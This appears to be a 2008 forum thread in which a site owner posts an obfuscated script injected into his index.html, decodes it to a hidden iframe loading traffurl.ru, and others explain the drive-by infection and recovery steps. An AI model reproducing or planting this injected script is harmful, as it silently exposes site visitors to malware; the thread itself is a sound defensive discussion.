Strange javascript in my index.html file.

[simon_smith214]

Hi,

Somehow the index.html file of my website has been changed. What has
been added is:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d
%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e
%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d
%64%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f
%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d
%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d
%28%29%2a%32%36%38%34%35%29%2b%27%63%31%33%32%65%35%39%61%61%64%32%5c
%27%20%77%69%64%74%68%3d%35%39%20%68%65%69%67%68%74%3d
%34%35%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f
%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Which translates to:

"window.status='Done';document.write('<iframe name=d5 src=\'http://
traffurl.ru/sliv?'+Math.round(Math.random()*26845)+'c132e59aad2\'
width=59 height=455 style=\'display: none\'></iframe>')"));

Can anyone please expain what this means? traffurl.ru is listed as
dangerous my Google and ZoneAlarm and was registered in late December
2007.

Also, why would anyone have edited my index.html file to say this?

Thanks.

 

[John W. Kennedy]

Hi,

Somehow the index.html file of my website has been changed. What has
been added is:

.....

I am not a security expert, so I can only warn you to do the safe thing.

Shut down your system at once, disconnect it from the Internet, and get
in touch at once with a professional security expert and the FBI, or
whatever agency is appropriate in your country. Until proof is found to
the contrary, you must assume that this is A) malicious work by
professional criminals, and B) designed to infect everyone who views
your page.

 

[Stevo]

Which translates to:

"window.status='Done';document.write('<iframe name=d5 src=\'http://
traffurl.ru/sliv?'+Math.round(Math.random()*26845)+'c132e59aad2\'
width=59 height=455 style=\'display: none\'></iframe>')"));

Can anyone please expain what this means? traffurl.ru is listed as
dangerous my Google and ZoneAlarm and was registered in late December
2007.

Also, why would anyone have edited my index.html file to say this?

This is exactly the type of thing we had a discussion on here recently
about. People think that by not going to porn/warez/nasty websites,
they're fairly safe from receiving malicious code that breaks through
unplugged security holes in their browsers. Generally that has some
truth to it, but not in cases like this. It looks like your site has
been hacked. The main intention being that they want your site to
include this iframe to their site. The effect being that you're driving
people to their site unknowingly and they're most likely being affected
(if they haven't had all their Windows updates and/or kept their Virus
signatures up to date). Even if a user is all up to date, there are
still holes that can malicious code can get through. What John Kennedy
said regarding shutting down and contacting your nearest equivalent of
the FBI might sound a bit overdramatic, but in principle what he's
saying is correct. At the very least, you want to make sure your remote
router admin is disabled. You might want to do a hard-reset of it to
revert to the original password (as the hacker might have changed it).
Make sure you put a good password in (assuming this is the way you were
hacked). Do you keep backups?

 

[Stevo]

Stevo said the following on 2/10/2008 4:23 AM:
As for it being a site that you are "driving visitors" to, that is
nonsense. The iframe is hidden - display: none. Doesn't make a lot of
sense to drive someone to your site if you hide the window it is going
to be displayed in.

Bet you an internet beer it is a tracking site.

Mine's an Internet Grimbergen. Why would the iframe need to be visible?
It still would load up it's html page and download it's nasty payload. I
would think that having it invisible increases the chances that the
bemused user doesn't panic and close the browser immediately. They'd be
just starting at it (in it's "Done" state) wondering "yeah? and now? do
something then!". Little do they realize that the invisible iframe is
already doing just what it wanted.

 

[Stevo]

just starting at it (in it's "Done" state) wondering "yeah? and now? do

*staring*

 

[The Magpie]

I agree that something got whacked somewhere. But, before you can
even answer the question, you would have to know where the "file"
is served from. It could be on a server that has free FTP - for a
price - and is silently inserting it.
Agreed, you do.

As for it being a site that you are "driving visitors" to, that is
nonsense. The iframe is hidden - display: none. Doesn't make a lot
of sense to drive someone to your site if you hide the window it is
going to be displayed in.

Correct - nothing to do with the site location.

Bet you an internet beer it is a tracking site.

There, you lose.

Its a trojan disguised as a codec and drops quietly and happily into
your system through Media Player (unless you are one of the few
cautious types who set it to choose "Don't download codecs without
bloody asking me first!"). For the OP this means a couple of things.

1. Your PC is now infected and has been recruited into a botnet.
2. Your website is infecting other PCs every time one visits it.
3. Your PC is now being used by a - probably criminal - gang.
4. The hard one - you know about it, so you are responsible.

In essence, this means fix the website, or you could be sued. Clean
your PC, or you could be sued. Report the hacking to your hosting
provider, or you could be sued. Report it to your local or national
police, or - worst of all - you could be charged as an accessory to
the criminal activity probably now going on with your PC and with all
your website visitors. Yes, this is serious. You need to deal with it.

 

[Stevo]

Its a trojan disguised as a codec and drops quietly and happily into
your system through Media Player (unless you are one of the few cautious
types who set it to choose "Don't download codecs without bloody asking
me first!"). For the OP this means a couple of things.

Great Info. I didn't know that. I've now joined the group of cautious
types I foolishly thought that windows media player would only
download codecs from a pre-tested library of them that it maintained on
a microsoft server. If it blindly takes the codec URL out of the video
file (or now I think about it, more likely out of the codebase tag of
the object/embed) then that's a serious risk. This option in Windows
Media Player is in the Tools-Options (Player tab). Better check Real
Player and Quicktime too

 

[Stevo]

Great Info. I didn't know that. I've now joined the group of cautious
types I foolishly thought that windows media player would only
download codecs from a pre-tested library of them that it maintained on
a microsoft server. If it blindly takes the codec URL out of the video
file (or now I think about it, more likely out of the codebase tag of
the object/embed) then that's a serious risk. This option in Windows
Media Player is in the Tools-Options (Player tab). Better check Real
Player and Quicktime too

Don't be ridiculous Stevo. The codebase tag won't be used for the codec,
that would only be for the ActiveX control for the player itself. Try
drinking some coffee before your first post next time fool!

 

[The Magpie]

The Magpie said the following on 2/11/2008 7:40 PM:

I will have to email you a beer sometime.

Its the joy of a slightly shady past, Randy.... I know where to look
for details of these things. Seriously though, I used to work with
security firms and it really is worthwhile knowing a few of the source
sites - even if some are quite openly hacker sites.

If you are interested - and fairly brave, or have a quarantine machine
or a safe VM you can put at risk - the site I found details of this
little horror on is http://www.malwaredomainlist.com/

Be warned though - it really is a collection of not-at-all-safe
domains you can look at for details.

 

[The Magpie]

Great Info. I didn't know that. I've now joined the group of cautious
types I foolishly thought that windows media player would only
download codecs from a pre-tested library of them that it maintained on
a microsoft server. If it blindly takes the codec URL out of the video
file (or now I think about it, more likely out of the codebase tag of
the object/embed) then that's a serious risk. This option in Windows
Media Player is in the Tools-Options (Player tab). Better check Real
Player and Quicktime too

Oh bugger! I never even considered RealPlayer myself - that's a great
point and very timely. Thanks.

 

[Thomas 'PointedEars' Lahn]

....

I am not a security expert, so I can only warn you to do the safe thing.

Shut down your system at once, disconnect it from the Internet,

Definitely. The next thing would be to set it up completely new and install
all security patches *before* connecting it to any network again, after
which one would want to change all passwords and other sensible login
information.

It would also be prudent not to install snake-oil software and instead
disable unnecessary services (that keep ports open) this time:

[en] http://www.iks-jena.de/mitarb/lutz/usenet/Firewall.en.html
[de] http://www.iks-jena.de/mitarb/lutz/usenet/Firewall.html

And although I'm not sure about the circumstances, the OP should definitely
avoid using a desktop PC as a public Web server.

and get in touch at once with a professional security expert and the FBI, or
whatever agency is appropriate in your country.

Given that the host name of the URL cannot be resolved, that might be
breaking a fly on the wheel. Especially since local authorities would have
certain problems prosecuting any vulnerability attack coming from servers
abroad (the OP is probably located in Germany as his NNTP-Posting-Host
header value indicates an IPv5 address belonging to the IP address range of
Strato GmbH, Berlin).

Until proof is found to the contrary, you must assume that this is A)
malicious work by professional criminals, and B) designed to infect
everyone who views your page.

You are jumping to conclusions, which makes your recommendation rather FUD
than sound advice. There is not even proof of an attempt at infection
(until further notice), only of one compromised system that may have been
cracked by J. Random Cracker using any of the prepackaged cracking toolkits
that are searching for known vulnerabilities of unpatched systems and are
available online for free.


PointedEars

 

[The Magpie]

You are jumping to conclusions, which makes your recommendation rather FUD
than sound advice.

I did jump to the conclusion that other machines had already been
compromised, but the code is comparatively well-known and reported so
I read the reports. You are right though - I presumed what the reports
said the software did had happened to the OP, and I should not have
done that.